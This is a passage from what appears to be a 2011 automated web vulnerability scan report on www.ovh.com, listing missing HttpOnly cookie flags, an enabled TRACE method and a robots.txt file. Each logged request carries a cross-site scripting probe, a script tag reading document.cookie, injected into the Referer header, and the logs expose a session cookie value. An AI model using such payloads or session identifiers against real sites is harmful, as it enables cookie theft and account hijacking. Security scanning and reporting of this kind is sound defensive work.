Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Fri, 04 Jun 2010 02:44:19 GMT
ETag: "1185fa-31a-4882b4cbc0ff7"
Accept-Ranges: bytes
Content-Length: 794
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:14:39 GMT
Content-Type: image/jpeg
Content-Language: fr

......JFIF.....#.#.....C......................    ....
   ..


.......

.................................................................)........................1!AQaq2...."B..........?..eA....KI...(...
...[SNIP]...

3.136. http://www.ovh.com/themes/10/products.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/products.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/products.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 01 Mar 2011 12:38:38 GMT
ETag: "2a7489-1f764-49d6b13558c8a"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:05 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Language: fr
Content-Length: 128868

/* css document */

/* ========== Common styles ========== */

ul { margin-left: 10px; margin-bottom: 5px; }

ul.blue li {
list-style-image: url('../../themes/default/images/shared/listImage.gif')
...[SNIP]...

3.137. http://www.ovh.com/themes/10/share.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/10/share.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/10/share.css HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:05 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 22 Feb 2011 16:24:37 GMT
ETag: "2b8c63-2bcb-49ce16a9e6100"
Accept-Ranges: bytes
Cache-Control: max-age=300
Expires: Sat, 05 Mar 2011 16:19:05 GMT
Vary: Accept-Encoding
Content-Type: text/css
Content-Language: fr
Content-Length: 11211

/* CSS Document */

body {
background : #eaeaea url('../../themes/10/main/bg.jpg') repeat-x 0 0;
margin : 0px;
text-align : center;
border-top: 1px solid #a5a5a5;
}

* {
font-fami
...[SNIP]...

3.138. http://www.ovh.com/themes/default/images/ecran-erreur-bleu.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/default/images/ecran-erreur-bleu.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/default/images/ecran-erreur-bleu.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:41 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Mon, 28 Jun 2010 11:08:29 GMT
ETag: "1300e2-326b-48a1523fae9b1"
Accept-Ranges: bytes
Content-Length: 12907
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 16:46:20 GMT
Age: 1701
Content-Type: image/png

.PNG
.
...IHDR..............w.S....bKGD...... X..... pHYs..."..."........ vpAg...........3...1.IDATx...g@T..6.{O........b.
V"V,H.KTTT.-*b.DM,.56@E.....-**.h...)*Uz..0e?r|......p6.....]..g07...^..i.
...[SNIP]...

3.139. http://www.ovh.com/themes/default/images/header/header_sub_menu_sep.png previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/themes/default/images/header/header_sub_menu_sep.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/default/images/header/header_sub_menu_sep.png HTTP/1.1
Host: www.ovh.com
Proxy-Connection: keep-alive
Referer: http://www.ovh.com/favicon.icoda795%3Cscript%3Ealert(document.cookie)%3C/script%3E6cb7c8dca04
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OVHSESSIONID=74d40cc4424190f5f0a0baa2153f02e0; slb=R119476070

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119476070; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:14:39 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Tue, 08 Jul 2008 18:48:25 GMT
ETag: "3478e-97-45187a30fd040"
Accept-Ranges: bytes
Content-Length: 151
Cache-Control: max-age=3600
Expires: Sat, 05 Mar 2011 17:14:39 GMT
Content-Type: image/png
Content-Language: fr

.PNG
.
...IHDR.............L.W.....sBIT....|.d.... pHYs.......B(.x....tEXtSoftware.www.inkscape.org..<.....IDAT..c....&........Y.#..:_....IEND.B`.

4. TRACE method is enabled previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

Request

TRACE / HTTP/1.0
Host: www.ovh.com
Cookie: 56b70b1827908822

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119467358; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:27 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.ovh.com
Cookie: 56b70b1827908822

5. Robots.txt file previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ovh.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.ovh.com

Response

HTTP/1.1 200 OK
Set-Cookie: slb=R119363903; path=/; expires=Tue, 08-Mar-2011 04:14:30 GMT
Date: Sat, 05 Mar 2011 16:10:29 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8g mod-xslt/1.3.9
Last-Modified: Thu, 22 Oct 2009 10:03:51 GMT
ETag: "2ac29-a8-4768336524fc0"
Accept-Ranges: bytes
Content-Length: 168
Cache-Control: max-age=60
Expires: Sat, 05 Mar 2011 16:11:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Language: fr

User-agent: *

Disallow: /cgi-bin/
Disallow: /images/
Disallow: /themes/
Disallow: /banners/

Disallow: /fr/pattern/
Disallow: /fr/espaceclients/support/supportv2.cgi

Report generated by XSS.CX Research Blog at Sat Mar 05 20:31:09 CST 2011.